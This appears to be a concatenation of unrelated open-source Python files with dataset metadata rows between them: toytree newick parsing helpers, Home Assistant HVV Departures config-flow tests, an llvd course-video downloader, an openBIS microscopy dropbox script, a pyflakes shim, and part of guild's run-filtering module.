('dist', float, True),
],
# strict with support values
# Format 2 = (A:0.35,(B:0.72,(D:0.60,G:0.12)1.00:0.64)1.00:0.56);
2: [
('name', str, False),
('dist', float, False),
        ('support', float, False),
('dist', float, False),
],
# strict with internal node names
# Format 3 = (A:0.35,(B:0.72,(D:0.60,G:0.12)E:0.64)C:0.56);
3: [
('name', str, False),
('dist', float, False),
('name', str, False),
('dist', float, False),
],
    # strict, leaf names and leaf branch lengths only
# Format 4 = (A:0.35,(B:0.72,(D:0.60,G:0.12)));
4: [
('name', str, False),
('dist', float, False),
(None, None, False),
(None, None, False),
],
# Format 5 = (A:0.35,(B:0.72,(D:0.60,G:0.12):0.64):0.56);
5: [
('name', str, False),
('dist', float, False),
(None, None, False),
('dist', float, False),
],
# Format 6 = (A:0.35,(B:0.72,(D:0.60,G:0.12)E)C);
6: [
('name', str, False),
(None, None, False),
(None, None, False),
('dist', float, False),
],
# Format 7 = (A,(B,(D,G)E)C);
7: [
('name', str, False),
('dist', float, False),
('name', str, False),
(None, None, False),
],
# Format 8 = (A,(B,(D,G)));
8: [
('name', str, False),
(None, None, False),
('name', str, False),
(None, None, False),
],
# Format 9 = (,(,(,)));
9: [
('name', str, False),
(None, None, False),
(None, None, False),
(None, None, False),
],
# Format 10 = ((a[&Z=1,Y=2]:1.0[&X=3], b[&Z=1,Y=2]:3.0[&X=2]):1.0[&L=1,W=0], ...
# NHX Like mrbayes NEXUS common
10: [
('name', str, True),
('dist', str, True),
('name', str, True),
('dist', str, True),
]
}
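# The four entries in each format describe, in order, how to cast the leaf
# name, the leaf dist, the internal node label (a name or a support value),
# and the internal node dist; the trailing boolean appears to mark the
# "flexible" formats above. A hedged sketch of consuming one field --
# ``cast_nw_field`` is illustrative only, not part of toytree's API:
def cast_nw_field(tree_format, position, raw):
    "Cast one raw newick field per NW_FORMAT; returns (attr, value)."
    attr, caster, _flexible = NW_FORMAT[tree_format][position]
    if attr is None or raw is None:
        return None, None
    return attr, caster(raw)
# e.g. cast_nw_field(0, 2, "1.00") -> ("support", 1.0)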
# class TreeInference:
# - get distance matrix (from an input data set... phy, nex)
# - ----- create a class to store DNA matrix (pandas colored)
# - NJ tree infer
# ------ uses distance matrix
# - UPGMA tree infer
# ------ uses distance matrix
#class TreeMoves:
# def move_spr(self):
# """
# Sub-tree pruning and Regrafting.
# Select one edge randomly from the tree and split on that edge to create
# two subtrees. Attach one of the subtrees (e.g., the smaller one)
# randomly to the larger tree to create a new node.
# ... does SPR break edges connected to root when tree is real rooted?
# """
# pass
# # On rooted trees we can work with nodes easier than edges. Start by
# # selected a node at random that is not root.
# # nodes = [i for i in self.ttree.tree.traverse() if not i.is_root()]
# # rnode = nodes[random.randint(0, len(nodes) - 1)]
# # # get all edges on the tree, skip last one which is non-real root edge
# # edges = self.ttree.tree.get_edges()[:-1]
# # # select a random edge
# # redge = edges[random.randint(0, len(edges))]
# # # break into subtrees
# # tre1 = self.tree.prune(self.tree.get_common_ancestor(redge[0]).idx)
# # tre2 = self.tree.prune(self.tree.get_common_ancestor(redge[1]).idx)
# def move_tbr(self):
# pass
# def move_nni(self):
# pass
# def non_parametric_rate_smoothing(self):
# """
#         Non-parametric rate smoothing.
# A method for estimating divergence times when evolutionary rates are
# variable across lineages by minimizing ancestor-descendant local rate
# changes. According to Sanderson this method is motivated by the
# likelihood that evolutionary rates are autocorrelated in time.
# returns Toytree
# """
# # p is a fixed exponent
# p = 2
# W = []
# for node in self.ttree.traverse():
# if not node.is_leaf():
# children = node.children
# ks = []
# for child in children:
# dist = abs(node.dist - child.dist)
# ks.append(dist ** p)
# W.append(sum(ks))
# # root rate is mean of all descendant rates --
# # n is the number of edges (rates) (nnodes - 1 for root)
# r_root = np.mean(W)
# rootw = []
# for child in self.ttree.tree.children:
#             rootw.append((r_root - child.dist) ** p)
# w_root = sum(rootw)
# W.append(w_root)
# k = []
# for
# k = sum( np.exp(abs(ri - rj), p) )
# W = sum(k)
# def penalized_likelihood(...):
# pass
#
# def wfunc(ttree, p):
# ws = []
# for node in ttree.tree.traverse():
# if not node.is_leaf():
# w = sum([(node.dist - child.dist) ** p for child in node.children])
# ws.append(w)
# return sum(ws)
#######################################################
# Other
#######################################################
def bpp2newick(bppnewick):
"converts bpp newick format to normal newick. ugh."
regex1 = re.compile(r" #[-+]?[0-9]*\.?[0-9]*[:]")
regex2 = re.compile(r" #[-+]?[0-9]*\.?[0-9]*[;]")
regex3 = re.compile(r": ")
new = regex1.sub(":", bppnewick)
new = regex2.sub(";", new)
new = regex3.sub(":", new)
return new.strip()
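# A hedged example of the conversion (the bpp string is illustrative):
#
#   bpp2newick("((a #0.1:1.0, b #0.2:1.0) #0.3:1.0);")
#   # -> "((a:1.0, b:1.0):1.0);"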
# TODO: would be useful for (eg., root) to have option to return not mrca,
# and fuzzy match just tips, or nodes, etc...
def normalize_values(vals, nbins=10, minsize=2, maxsize=12):
"""
Distributes values into bins spaced at reasonable sizes for plotting.
    For example, this can be used to automatically scale Ne values to plot
    as edge widths.
"""
# make copy of original
ovals = deepcopy(vals)
# if 6X min value is higher than max then add this
# as a fake value to scale more nicely
vals = list(vals)
if min(vals) * 6 > max(vals):
vals.append(min(vals) * 6)
# sorted vals list
svals = sorted(vals)
# put vals into bins
bins = np.histogram(vals, bins=nbins)[0]
# convert binned vals to widths in 2-12
newvals = {}
sizes = np.linspace(minsize, maxsize, nbins)
for idx, inbin in enumerate(bins):
for num in range(inbin):
newvals[svals.pop(0)] = sizes[idx]
return np.array([newvals[i] for i in ovals])
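# A worked example (values are illustrative): for vals = [1, 2, 3] the 6x rule
# appends a fake value 6, np.histogram over [1, 6] places 1/2/3/6 into bins
# 0/2/4/9, and sizes = np.linspace(2, 12, 10) maps them, so the function
# returns roughly [2.0, 4.22, 6.44] for the original three values.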
# def fuzzy_match_tipnames(ttree, names, wildcard, regex, mono=True, retnode=True):
def fuzzy_match_tipnames(ttree, names, wildcard, regex, mrca=True, mono=True):
"""
    Used in multiple internal functions (e.g., .root() and .drop_tips())
    to select an internal mrca node or multiple tipnames using fuzzy matching,
    so that not every name needs to be written out by hand.
name: verbose list
wildcard: matching unique string
regex: regex expression
mrca: return mrca node of selected tipnames.
mono: raise error if selected tipnames are not monophyletic
"""
# require arguments
if not any([names, wildcard, regex]):
raise ToytreeError(
"must enter an outgroup, wildcard selector, or regex pattern")
# get list of **nodes** from {list, wildcard, or regex}
tips = []
if names:
if isinstance(names, (str, int)):
names = [names]
notfound = [i for i in names if i not in ttree.get_tip_labels()]
if any(notfound):
raise ToytreeError(
"Sample {} is not in the tree".format(notfound))
tips = [i for i in ttree.treenode.get_leaves() if i.name in names]
# use regex to match tipnames
elif regex:
tips = [
i for i in ttree.treenode.get_leaves() if re.match(regex, i.name)
]
if not any(tips):
raise ToytreeError("No Samples matched the regular expression")
# use wildcard substring matching
elif wildcard:
tips = [i for i in ttree.treenode.get_leaves() if wildcard in i.name]
if not any(tips):
raise ToytreeError("No Samples matched the wildcard")
# build list of **tipnames** from matched nodes
if not tips:
raise ToytreeError("no matching tipnames")
tipnames = [i.name for i in tips]
# if a single tipname matched no need to check for monophyly
if len(tips) == 1:
if mrca:
return tips[0]
else:
return tipnames
# if multiple nodes matched, check if they're monophyletic
mbool, mtype, mnames = (
ttree.treenode.check_monophyly(
tipnames, "name", ignore_missing=True)
)
# get mrca node
node = ttree.treenode.get_common_ancestor(tips)
# raise an error if required to be monophyletic but not
if mono:
if not mbool:
raise ToytreeError(
"Taxon list cannot be paraphyletic")
# return tips or nodes
if not mrca:
return tipnames
else:
return node
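# A hedged usage sketch (``tre`` is an illustrative Toytree whose tips
# "r0".."r9" are arranged so that "r0".."r4" form a clade):
#
#   node = fuzzy_match_tipnames(tre, None, None, regex=r"r[0-4]$")
#   # -> the mrca node of tips r0..r4
#   names = fuzzy_match_tipnames(tre, None, wildcard="r0", regex=None, mrca=False)
#   # -> ["r0"]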
| 28.88102
| 84
| 0.53742
|
4a18e63931544787b7523106c5608cb5144cf1d5
| 12,395
|
py
|
Python
|
tests/components/hvv_departures/test_config_flow.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 4
|
2020-08-10T20:02:24.000Z
|
2022-01-31T02:14:22.000Z
|
tests/components/hvv_departures/test_config_flow.py
|
jagadeeshvenkatesh/core
|
1bd982668449815fee2105478569f8e4b5670add
|
[
"Apache-2.0"
] | 78
|
2020-07-23T07:13:08.000Z
|
2022-03-31T06:02:04.000Z
|
tests/components/hvv_departures/test_config_flow.py
|
jagadeeshvenkatesh/core
|
1bd982668449815fee2105478569f8e4b5670add
|
[
"Apache-2.0"
] | 3
|
2022-01-17T20:10:54.000Z
|
2022-01-17T20:17:22.000Z
|
"""Test the HVV Departures config flow."""
import json
from unittest.mock import patch
from pygti.exceptions import CannotConnect, InvalidAuth
from homeassistant import data_entry_flow
from homeassistant.components.hvv_departures.const import (
CONF_FILTER,
CONF_REAL_TIME,
CONF_STATION,
DOMAIN,
)
from homeassistant.config_entries import SOURCE_USER
from homeassistant.const import CONF_HOST, CONF_OFFSET, CONF_PASSWORD, CONF_USERNAME
from tests.common import MockConfigEntry, load_fixture
FIXTURE_INIT = json.loads(load_fixture("hvv_departures/init.json"))
FIXTURE_CHECK_NAME = json.loads(load_fixture("hvv_departures/check_name.json"))
FIXTURE_STATION_INFORMATION = json.loads(
load_fixture("hvv_departures/station_information.json")
)
FIXTURE_CONFIG_ENTRY = json.loads(load_fixture("hvv_departures/config_entry.json"))
FIXTURE_OPTIONS = json.loads(load_fixture("hvv_departures/options.json"))
FIXTURE_DEPARTURE_LIST = json.loads(load_fixture("hvv_departures/departure_list.json"))
async def test_user_flow(hass):
"""Test that config flow works."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=FIXTURE_INIT,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value=FIXTURE_CHECK_NAME,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.stationInformation",
return_value=FIXTURE_STATION_INFORMATION,
), patch(
"homeassistant.components.hvv_departures.async_setup_entry",
return_value=True,
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["step_id"] == "station"
# step: station
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "Wartenau"},
)
assert result_station["step_id"] == "station_select"
# step: station_select
result_station_select = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "Wartenau"},
)
assert result_station_select["type"] == "create_entry"
assert result_station_select["title"] == "Wartenau"
assert result_station_select["data"] == {
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
CONF_STATION: {
"name": "Wartenau",
"city": "Hamburg",
"combinedName": "Wartenau",
"id": "Master:10901",
"type": "STATION",
"coordinate": {"x": 10.035515, "y": 53.56478},
"serviceTypes": ["bus", "u"],
"hasStationInformation": True,
},
}
async def test_user_flow_no_results(hass):
"""Test that config flow works when there are no results."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=FIXTURE_INIT,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value={"returnCode": "OK", "results": []},
), patch(
"homeassistant.components.hvv_departures.async_setup_entry",
return_value=True,
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["step_id"] == "station"
# step: station
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "non_existing_station"},
)
assert result_station["step_id"] == "station"
assert result_station["errors"]["base"] == "no_results"
async def test_user_flow_invalid_auth(hass):
"""Test that config flow handles invalid auth."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
side_effect=InvalidAuth(
"ERROR_TEXT",
"Bei der Verarbeitung der Anfrage ist ein technisches Problem aufgetreten.",
"Authentication failed!",
),
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["type"] == "form"
assert result_user["errors"] == {"base": "invalid_auth"}
async def test_user_flow_cannot_connect(hass):
"""Test that config flow handles connection errors."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
side_effect=CannotConnect(),
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["type"] == "form"
assert result_user["errors"] == {"base": "cannot_connect"}
async def test_user_flow_station(hass):
"""Test that config flow handles empty data on step station."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=True,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value={"returnCode": "OK", "results": []},
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["step_id"] == "station"
# step: station
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
None,
)
assert result_station["type"] == "form"
assert result_station["step_id"] == "station"
async def test_user_flow_station_select(hass):
"""Test that config flow handles empty data on step station_select."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=True,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value=FIXTURE_CHECK_NAME,
):
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "Wartenau"},
)
# step: station_select
result_station_select = await hass.config_entries.flow.async_configure(
result_station["flow_id"],
None,
)
assert result_station_select["type"] == "form"
assert result_station_select["step_id"] == "station_select"
async def test_options_flow(hass):
"""Test that options flow works."""
config_entry = MockConfigEntry(
version=1,
domain=DOMAIN,
title="Wartenau",
data=FIXTURE_CONFIG_ENTRY,
source=SOURCE_USER,
system_options={"disable_new_entities": False},
options=FIXTURE_OPTIONS,
unique_id="1234",
)
config_entry.add_to_hass(hass)
with patch("homeassistant.components.hvv_departures.PLATFORMS", new=[]), patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=True,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
return_value=FIXTURE_DEPARTURE_LIST,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={CONF_FILTER: ["0"], CONF_OFFSET: 15, CONF_REAL_TIME: False},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options == {
CONF_FILTER: [
{
"serviceID": "HHA-U:U1_HHA-U",
"stationIDs": ["Master:10902"],
"label": "Fuhlsbüttel Nord / Ochsenzoll / Norderstedt Mitte / Kellinghusenstraße / Ohlsdorf / Garstedt",
"serviceName": "U1",
}
],
CONF_OFFSET: 15,
CONF_REAL_TIME: False,
}
async def test_options_flow_invalid_auth(hass):
"""Test that options flow works."""
config_entry = MockConfigEntry(
version=1,
domain=DOMAIN,
title="Wartenau",
data=FIXTURE_CONFIG_ENTRY,
source=SOURCE_USER,
system_options={"disable_new_entities": False},
options=FIXTURE_OPTIONS,
unique_id="1234",
)
config_entry.add_to_hass(hass)
with patch("homeassistant.components.hvv_departures.PLATFORMS", new=[]), patch(
"homeassistant.components.hvv_departures.hub.GTI.init", return_value=True
), patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
return_value=FIXTURE_DEPARTURE_LIST,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
with patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
side_effect=InvalidAuth(
"ERROR_TEXT",
"Bei der Verarbeitung der Anfrage ist ein technisches Problem aufgetreten.",
"Authentication failed!",
),
):
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
assert result["errors"] == {"base": "invalid_auth"}
async def test_options_flow_cannot_connect(hass):
"""Test that options flow works."""
config_entry = MockConfigEntry(
version=1,
domain=DOMAIN,
title="Wartenau",
data=FIXTURE_CONFIG_ENTRY,
source=SOURCE_USER,
system_options={"disable_new_entities": False},
options=FIXTURE_OPTIONS,
unique_id="1234",
)
config_entry.add_to_hass(hass)
with patch("homeassistant.components.hvv_departures.PLATFORMS", new=[]), patch(
"homeassistant.components.hvv_departures.hub.GTI.init", return_value=True
), patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
return_value=FIXTURE_DEPARTURE_LIST,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
with patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
side_effect=CannotConnect(),
):
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
assert result["errors"] == {"base": "cannot_connect"}
| 33.141711
| 124
| 0.623477
|
4a18e63af34f4c5b2ee35242c56e345b5c542a17
| 2,540
|
py
|
Python
|
llvd/downloader.py
|
vgoebbels/llvd
|
bc86fa4f2f7b57d61452408bae08966216413dcb
|
[
"MIT"
] | null | null | null |
llvd/downloader.py
|
vgoebbels/llvd
|
bc86fa4f2f7b57d61452408bae08966216413dcb
|
[
"MIT"
] | null | null | null |
llvd/downloader.py
|
vgoebbels/llvd
|
bc86fa4f2f7b57d61452408bae08966216413dcb
|
[
"MIT"
] | null | null | null |
from tqdm import tqdm
import requests
import time
import click
import re
def download_video(url, index, filename):
"""
Downloads a video and saves it by its name plus index for easy sorting
"""
print("\n" + filename + "\n")
    maximum_retries = 5
    # Mount an HTTPAdapter on a session so max_retries actually takes effect
    # (previously the adapter was created and then discarded, unused).
    session = requests.Session()
    adapter = requests.adapters.HTTPAdapter(max_retries=maximum_retries)
    session.mount("https://", adapter)
    session.mount("http://", adapter)
    with open(f"{index}-{filename}.mp4", 'wb') as f:
        download_size = None
        while maximum_retries > 0:
            response = session.get(
                url, stream=True, headers={'Accept-Encoding': None, 'Content-Encoding': 'gzip'})
            download_size = response.headers.get('content-length')
            if download_size is None and maximum_retries > 0:
                maximum_retries -= 1
            else:
                break
pbar = tqdm(
            # total may be None when the server never sent content-length
            total=int(download_size) if download_size else None,
initial=0,
unit='B',
unit_scale=True,
position=0,
leave=True)
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
pbar.set_description("progress")
pbar.update(len(chunk))
pbar.close()
print("\n")
def download_exercises(links):
"""
Downloads exercises
"""
    click.echo(
        click.style("Downloading exercise files...\n", fg="green"))
    # Use a session with a mounted HTTPAdapter so max_retries takes effect,
    # and reset the retry budget for each link rather than sharing it.
    session = requests.Session()
    session.mount("https://", requests.adapters.HTTPAdapter(max_retries=5))
    session.mount("http://", requests.adapters.HTTPAdapter(max_retries=5))
    for link in links:
        maximum_retries = 5
        filename = re.split("exercises/(.+).zip", link)[1]
        with open(f"{filename}.zip", 'wb') as f:
            download_size = None
            while maximum_retries > 0:
                response = session.get(
                    link, stream=True, headers={'Accept-Encoding': None, 'Content-Encoding': 'gzip'})
                download_size = response.headers.get('content-length')
                if download_size is None and maximum_retries > 0:
                    maximum_retries -= 1
                else:
                    break
pbar = tqdm(
                # total may be None when the server never sent content-length
                total=int(download_size) if download_size else None,
initial=0,
unit='B',
unit_scale=True,
position=0,
leave=True)
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
pbar.set_description("progress")
pbar.update(len(chunk))
pbar.close()
print("\n")
| 32.151899
| 101
| 0.525197
|
4a18e732d4e19c9c904d94532c2042fb942f71de
| 960
|
py
|
Python
|
core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox/MicroscopyDropbox.py
|
aarpon/obit_microscopy_core_technology
|
9402922771129ac8bcf6ea3317563306b1293af1
|
[
"Apache-2.0"
] | 1
|
2018-12-20T23:55:40.000Z
|
2018-12-20T23:55:40.000Z
|
core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox/MicroscopyDropbox.py
|
aarpon/obit_microscopy_core_technology
|
9402922771129ac8bcf6ea3317563306b1293af1
|
[
"Apache-2.0"
] | 3
|
2017-09-25T14:47:51.000Z
|
2019-10-24T06:44:26.000Z
|
core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox/MicroscopyDropbox.py
|
aarpon/obit_microscopy_core_technology
|
9402922771129ac8bcf6ea3317563306b1293af1
|
[
"Apache-2.0"
] | 1
|
2017-09-25T08:12:06.000Z
|
2017-09-25T08:12:06.000Z
|
# -*- coding: utf-8 -*-
"""
@author: Aaron Ponti
"""
import os
import logging
from Processor import Processor
def process(transaction):
"""Dropbox entry point.
@param transaction, the transaction object
"""
# Get path to containing folder
# __file__ does not work (reliably) in Jython
dbPath = "../core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox"
# Path to the logs subfolder
logPath = os.path.join(dbPath, "logs")
# Make sure the logs subfolder exist
if not os.path.exists(logPath):
os.makedirs(logPath)
# Path for the log file
logFile = os.path.join(logPath, "log.txt")
# Set up logging
logging.basicConfig(filename=logFile, level=logging.DEBUG,
format='%(asctime)-15s %(levelname)s: %(message)s')
logger = logging.getLogger("Microscopy")
# Create a Processor
processor = Processor(transaction, logger)
# Run
processor.run()
| 22.325581
| 76
| 0.652083
|
4a18e796648140853dbbd6ca2252fc04b60e2b37
| 287
|
py
|
Python
|
blackmamba/lib/pyflakes/scripts/pyflakes.py
|
oz90210/blackmamba
|
65c82c8e99028d6fbb57098ce82d0a394df215a0
|
[
"MIT"
] | 913
|
2016-07-01T07:54:20.000Z
|
2022-03-30T07:15:23.000Z
|
blackmamba/lib/pyflakes/scripts/pyflakes.py
|
oz90210/blackmamba
|
65c82c8e99028d6fbb57098ce82d0a394df215a0
|
[
"MIT"
] | 405
|
2016-06-25T14:54:20.000Z
|
2022-03-23T14:22:10.000Z
|
blackmamba/lib/pyflakes/scripts/pyflakes.py
|
oz90210/blackmamba
|
65c82c8e99028d6fbb57098ce82d0a394df215a0
|
[
"MIT"
] | 249
|
2015-01-07T22:49:49.000Z
|
2022-03-18T02:32:06.000Z
|
"""
Implementation of the command-line I{pyflakes} tool.
"""
from __future__ import absolute_import
# For backward compatibility
__all__ = ['check', 'checkPath', 'checkRecursive', 'iterSourceCode', 'main']
from pyflakes.api import check, checkPath, checkRecursive, iterSourceCode, main
| 31.888889
| 79
| 0.773519
|
4a18e8570c52ba995ae01b1653564d623b7f16f5
| 54,569
|
py
|
Python
|
guild/commands/runs_impl.py
|
guildai/guild-python2
|
8f83e8234fc4b268b6f29ca7d0f1b93148e4d2a6
|
[
"Apache-2.0"
] | null | null | null |
guild/commands/runs_impl.py
|
guildai/guild-python2
|
8f83e8234fc4b268b6f29ca7d0f1b93148e4d2a6
|
[
"Apache-2.0"
] | null | null | null |
guild/commands/runs_impl.py
|
guildai/guild-python2
|
8f83e8234fc4b268b6f29ca7d0f1b93148e4d2a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017-2022 RStudio, PBC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import inspect
import json
import logging
import os
import re
import six
# IMPORTANT: Keep expensive imports out of this list. This module is
# used by several commands and any latency here will be automatically
# applied to those commands. If the import is used once or twice, move
# it into the applicable function(s). If it's used more than once or
# twice, move the command impl into a separate module (see
# publish_impl for example).
from guild import cli
from guild import cmd_impl_support
from guild import config
from guild import exit_code
from guild import flag_util
from guild import op_util
from guild import remote_run_support
from guild import run as runlib
from guild import run_util
from guild import util
from guild import var
from guild import yaml_util
from . import remote_impl_support
log = logging.getLogger("guild")
RUN_DETAIL = [
"id",
"operation",
"from",
"status",
"started",
"stopped",
"marked",
"label",
"sourcecode_digest",
"vcs_commit",
"run_dir",
"command",
"exit_status",
"pid",
]
ALL_RUNS_ARG = [":"]
LATEST_RUN_ARG = ["1"]
CORE_RUN_ATTRS = [
"cmd",
"comments",
"compare",
"deps",
"env",
"exit_status",
"flags",
"host",
"id",
"initialized",
"label",
"marked",
"objective",
"op",
"pip_freeze",
"platform",
"random_seed",
"run_params",
"sourcecode_digest",
"started",
"stopped",
"tags",
"user",
"user_flags",
"vcs_commit",
]
LEGACY_RUN_ATTRS = [
"resolved_deps",
"opdef",
]
RUNS_PER_GROUP = 20
FILTERABLE = [
("completed", "status_completed"),
("error", "status_error"),
("pending", "status_pending"),
("running", "status_running"),
("staged", "status_staged"),
("terminated", "status_terminated"),
]
if not os.getenv("SHELL"):
# Windows command prompt wants a space buffer to avoid wrapping.
STYLE_TABLE_WIDTH_ADJ = -1
else:
STYLE_TABLE_WIDTH_ADJ = 0
STOP_TIMEOUT = 30
CHILD_TERM_TIMEOUT = 5
def runs_for_args(args, ctx=None):
filtered = filtered_runs(args, ctx)
return select_runs(filtered, args.runs, ctx)
def filtered_runs(args, ctx=None):
if getattr(args, "remote", None):
return remote_impl_support.filtered_runs(args)
else:
return var.runs(
_runs_root_for_args(args),
sort=["-timestamp"],
filter=_runs_filter(args, ctx),
)
def _runs_root_for_args(args):
archive = getattr(args, "archive", None)
deleted = getattr(args, "deleted", False)
if archive and deleted:
cli.error("--archive and --deleted cannot both be used")
if archive:
return archive
else:
return var.runs_dir(deleted=deleted)
def _runs_filter(args, ctx):
filters = []
_apply_status_filter(args, filters)
_apply_ops_filter(args, filters)
_apply_labels_filter(args, filters)
_apply_tags_filter(args, filters)
_apply_comments_filter(args, filters)
_apply_marked_filter(args, filters)
_apply_started_filter(args, ctx, filters)
_apply_sourcecode_digest_filter(args, filters)
return var.run_filter("all", filters)
def _apply_status_filter(args, filters):
status_filters = [
var.run_filter("attr", "status", status)
for status, args_attr in FILTERABLE
if getattr(args, args_attr, False)
]
if status_filters:
filters.append(var.run_filter("any", status_filters))
def _apply_ops_filter(args, filters):
if args.filter_ops:
filters.append(_op_run_filter(args.filter_ops))
def _op_run_filter(op_refs):
def f(run):
opspec = run_util.format_operation(run, nowarn=True)
return any((_compare_op(ref, opspec) for ref in op_refs))
return f
def _compare_op(ref, opspec):
if ref.startswith("^") or ref.endswith("$"):
return _re_match(ref, opspec)
else:
return _opspec_match(ref, opspec)
def _re_match(pattern, target):
try:
return re.search(pattern, target)
except re.error:
return False
def _opspec_match(ref, opspec):
ref_parts = _split_opspec(ref)
opspec_parts = _split_opspec(opspec)
assert len(ref_parts) == 3 and len(opspec_parts) == 3, (ref_parts, opspec_parts)
for ref_part, opspec_part in zip(ref_parts, opspec_parts):
if not _opspec_part_match(ref_part, opspec_part):
return False
return True
def _split_opspec(opspec):
parsed = op_util.parse_opspec(opspec)
if parsed:
model, op = parsed
pkg, model = _split_model_pkg(model)
return pkg, model, op
return None, None, None
def _split_model_pkg(model):
if model:
parts = model.split("/", 1)
if len(parts) == 2:
return parts
return None, model
def _opspec_part_match(ref, part):
if not ref:
return True
if not part:
return False
if "*" in ref:
return _opspec_part_fnmatch(ref, part)
else:
return ref == part
def _opspec_part_fnmatch(ref, part):
from fnmatch import fnmatch
return fnmatch(part, ref)
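# Illustrative matches for the helpers above (a hedged sketch; assumes
# op_util.parse_opspec("train") yields (None, "train")):
#   _compare_op("train", "mnist:train")   -> True (model part left unspecified)
#   _compare_op("mnist:*", "mnist:train") -> True (fnmatch wildcard on the op)
#   _compare_op("^mnist", "mnist:train")  -> True (anchored refs use _re_match)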
def _apply_labels_filter(args, filters):
if args.filter_labels and args.filter_unlabeled:
cli.error("--label and --unlabeled cannot both be used")
if args.filter_labels:
filters.append(_labels_filter(args.filter_labels))
elif args.filter_unlabeled:
filters.append(_unlabeled_filter())
def _labels_filter(filter_vals):
def f(run):
run_label = str(run.get("label", "")).strip()
return any((_match_label(s, run_label) for s in filter_vals))
return f
def _match_label(s, run_label):
if s == "-":
return not run_label
return s in run_label
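# Note the "-" sentinel: `--label -` selects runs with an empty label, e.g.
# _match_label("-", "") -> True while _match_label("-", "step-1") -> False.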
def _unlabeled_filter():
def f(run):
return not run.get("label", "").strip()
return f
def _apply_tags_filter(args, filters):
if args.filter_tags:
filters.append(_tags_filter(args.filter_tags))
def _tags_filter(tags):
def f(run):
run_tags = run.get("tags") or []
return any((t in run_tags for t in tags))
return f
def _apply_comments_filter(args, filters):
if args.filter_comments:
filters.append(_comments_filter(args.filter_comments))
def _comments_filter(filter_vals):
def f(run):
comment_text = _run_comments_text(run)
return any((_match_comments(s, comment_text) for s in filter_vals))
return f
def _run_comments_text(run):
comments = run.get("comments") or []
return "\n".join([_run_comment_filter_text(comment) for comment in comments])
def _run_comment_filter_text(comment):
return "\n".join(
[
(comment.get("user") or "").lower(),
(comment.get("host") or "").lower(),
